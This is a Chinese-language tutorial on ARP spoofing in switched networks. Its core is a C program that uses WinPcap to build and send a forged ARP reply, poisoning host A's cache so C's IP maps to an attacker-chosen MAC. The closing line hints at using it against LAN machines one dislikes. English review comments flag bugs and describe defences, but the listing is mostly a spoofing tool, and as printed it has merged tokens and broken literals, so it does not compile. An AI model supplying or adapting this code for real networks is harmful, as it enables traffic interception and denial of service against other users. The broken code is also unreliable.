
交换网络中的嗅探和ARP欺骗

我们来实现这样的ARP欺骗。这里需要使用一个WinPcap提供的API和驱动。(http://winpcap.polito.it/)

winpcap是一个伟大而且开放的项目。Windows环境下的nmap、snort、windump都是使用的winpcap。

///////////////////////////////////////////////////////

//

// ARP Sender

//

// Creator: Refdom

// Email: refdom@263.net

// Home Page: www.opengram.com

//

// 2002/4/7

//

///////////////////////////////////////////////////////

#include "stdafx.h"

#include "Mac.h"

//GetMacAddr(),我写的把字符串转换为MAC地址的函数,就不列在这里了

#include

#include

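/*
 * Protocol constants used when filling in the Ethernet and ARP headers.
 * The listing as printed had lost the whitespace between several macro
 * names and their values (e.g. "EPT_IP0x0800", "#defineARP_REQUEST0x0001"),
 * which would define differently named, empty macros; the separators are
 * restored here so the names match their uses in main().
 * All values are in host byte order; callers convert with htons().
 */

/* EtherType values (Ethernet header "type" field). */
#define EPT_IP          0x0800  /* type: IP */
#define EPT_ARP         0x0806  /* type: ARP */
#define EPT_RARP        0x8035  /* type: RARP */

/* ARP hardware-address format written to arp_hrd. */
#define ARP_HARDWARE    0x0001  /* Dummy type for 802.3 frames */

/* ARP operation codes written to arp_op. */
#define ARP_REQUEST     0x0001  /* ARP request */
#define ARP_REPLY       0x0002  /* ARP reply */

/* Number of rows in main()'s AdapterList table. */
#define Max_Num_Adapter 10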

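/*
 * On-the-wire layouts for an Ethernet frame carrying an ARP message.
 * Packing is forced to 1 byte so the compiler inserts no padding and the
 * structs can be copied straight into a frame buffer.
 *
 * The listing as printed had lost the space between each member's type and
 * name ("unsigned chareh_dst[6]", "EHHDRehhdr", ...); the declarations are
 * restored so the member names match the ones main() assigns to.
 *
 * All multi-byte fields are expected in network byte order.
 */
#pragma pack(push, 1)

/* Ethernet header: 6 + 6 + 2 = 14 bytes. */
typedef struct ehhdr
{
    unsigned char  eh_dst[6];   /* destination ethernet address */
    unsigned char  eh_src[6];   /* source ethernet address */
    unsigned short eh_type;     /* ethernet packet type */
} EHHDR, *PEHHDR;

/*
 * ARP message body for 6-byte hardware / 4-byte protocol addresses.
 * NOTE(review): arp_spa and arp_tpa are declared unsigned long, which is
 * 4 bytes on Windows (the platform this listing targets). On a platform
 * where unsigned long is 8 bytes the struct no longer matches the ARP
 * wire format.
 */
typedef struct arphdr
{
    unsigned short arp_hrd;     /* format of hardware address */
    unsigned short arp_pro;     /* format of protocol address */
    unsigned char  arp_hln;     /* length of hardware address */
    unsigned char  arp_pln;     /* length of protocol address */
    unsigned short arp_op;      /* ARP/RARP operation */
    unsigned char  arp_sha[6];  /* sender hardware address */
    unsigned long  arp_spa;     /* sender protocol address */
    unsigned char  arp_tha[6];  /* target hardware address */
    unsigned long  arp_tpa;     /* target protocol address */
} ARPHDR, *PARPHDR;

/* Complete frame: Ethernet header immediately followed by the ARP body. */
typedef struct arpPacket
{
    EHHDR  ehhdr;
    ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)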

// Builds one Ethernet frame carrying an ARP reply from hard-coded placeholder
// addresses and hands it to the first adapter returned by the WinPcap
// packet.dll API (PacketGetAdapterNames / PacketOpenAdapter / PacketSendPacket).
//
// Returns 0 on every path, including all error paths, so the exit status does
// not tell a caller whether anything was sent.
//
// The code is kept exactly as printed on the page. Several declarations have
// lost the space between type and name (e.g. "LPADAPTERlpAdapter"), the NUL
// character literals appear as ''\0'', and one string literal is split across
// lines; as printed it does not compile.
//
// Defender's reading: the frame is an unsolicited ARP reply whose sender
// IP/MAC pair is chosen by the program rather than learned from the network.
// ARP carries no authentication, so the usual controls are switch-side
// validation of ARP against known bindings (Dynamic ARP Inspection with DHCP
// snooping), static ARP entries for critical hosts, and monitors that alert
// when an IP-to-MAC binding changes. The Ethernet source address written
// below differs from the ARP sender hardware address, which is a mismatch
// ARP-validation checks commonly look for.
int main(int argc, char* argv[])

{

// One row per adapter name; static, so the table starts zero-filled.
static char AdapterList[Max_Num_Adapter][1024];

// Frame buffer handed to the driver; only the first 60 bytes are sent.
char szPacketBuf[600];

// Scratch buffer for one parsed MAC address; declared without an initializer.
char MacAddr[6];

LPADAPTERlpAdapter;

LPPACKETlpPacket;

WCHARAdapterName[2048];

WCHAR*temp,*temp1;

ARPPACKET ARPPacket;

// Passed to PacketGetAdapterNames as the buffer length.
// NOTE(review): AdapterName holds 2048 WCHARs but the length given is 1024;
// which unit the API expects is not visible here -- confirm.
ULONG AdapterLength = 1024;

int AdapterNum = 0;

int nRetCode, i;

//Get The list of Adapter

if(PacketGetAdapterNames((char*)AdapterName,&AdapterLength)==FALSE)

{

printf("Unable to retrieve the list of the adapters!\n");

return 0;

}

// Split the returned buffer into AdapterList. The loop treats the buffer as
// NUL-separated wide strings ending at two consecutive NULs: temp scans,
// temp1 marks the start of the current name.
temp = AdapterName;

temp1=AdapterName;

i = 0;

// NOTE(review): on the first pass temp == AdapterName, so if the buffer
// starts with a NUL the right-hand test reads *(temp-1), one element before
// the start of the array.
while ((*temp != ''\0'')||(*(temp-1) != ''\0''))

{

if (*temp == ''\0'')

{

// Copies (temp-temp1) wide characters, counted as 2 bytes each; the
// terminator is not copied (the static table is already zero-filled).
// NOTE(review): i is never checked against Max_Num_Adapter and the length is
// never checked against the 1024-byte row, so a long list or a long name
// would write past AdapterList.
memcpy(AdapterList[i],temp1,(temp-temp1)*2);

temp1=temp+1;

i++;

}

temp++;

}

AdapterNum = i;

// Print the adapters found, numbered from 1.
for (i = 0; i < AdapterNum; i++)

wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);

printf("\n");

//Default open the 0

// NOTE(review): AdapterList[0] is used even when AdapterNum is 0.
lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);

// Take the first adapter (an assumption).

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))

{

nRetCode = GetLastError();

// NOTE(review): nRetCode is an int but is printed with %lx.
printf("Unable to open the driver, Error Code : %lx\n", nRetCode);

return 0;

}

lpPacket = PacketAllocatePacket();

if(lpPacket == NULL)

{

printf("\nError:failed to allocate the LPPACKET structure.");

// NOTE(review): returns without PacketCloseAdapter(lpAdapter). The later
// error returns likewise skip PacketFreePacket and PacketCloseAdapter.
return 0;

}

// Zero the whole buffer so the bytes after the copied headers are padding.
ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

// "BBBBBBBBBBBB" and the other MAC strings below are placeholders.
// GetMacAddr comes from Mac.h and is not shown on the page; from its use
// here it converts a string to a 6-byte MAC and returns zero on failure.
// NOTE(review): unlike the three later calls, this failure branch only prints
// and does not return, so the memcpy below runs with whatever MacAddr holds.
if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))

{

printf ("Get Mac address error!\n");

}

// NOTE(review): the original comment labels this "source MAC address", but
// the field written is eh_dst (destination).
memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); // "source MAC address" in the original comment

if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

// NOTE(review): the original comment labels this "destination MAC address
// (A's address)", but the field written is eh_src (source).
memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); // "destination MAC address (A's address)" in the original comment

// EtherType and the fixed ARP fields, converted to network byte order.
ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);

ARPPacket.arphdr.arp_pro = htons(EPT_IP);

// 6-byte hardware addresses, 4-byte protocol addresses.
ARPPacket.arphdr.arp_hln = 6;

ARPPacket.arphdr.arp_pln = 4;

ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);// forged MAC address for C

ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); // C's IP address

if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); // MAC address of target A

ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); // IP address of target A

// Copy the filled headers to the front of the zeroed frame buffer.
memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));

// Attach the buffer to the packet object with a length of 60 bytes; the bytes
// after the headers are the zeros written by ZeroMemory above.
PacketInitPacket(lpPacket, szPacketBuf, 60);

// Sets the adapter's write count to 2; a failure is reported as a warning
// only and execution continues.
if(PacketSetNumWrites(lpAdapter, 2)==FALSE)

{

printf("warning: Unable to send more than one packet in

a single write!\n");

}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)

{

printf("Error sending the packets!\n");

return 0;

}

printf ("Send ok!\n");

// close the adapter and exit

// Only this success path releases the packet object and the adapter.
PacketFreePacket(lpPacket);

PacketCloseAdapter(lpAdapter);

return 0;

}

于是A接收到一个被伪造的ARP应答。A被欺骗了!!倘若在局域网中看某某机器不顺眼,……
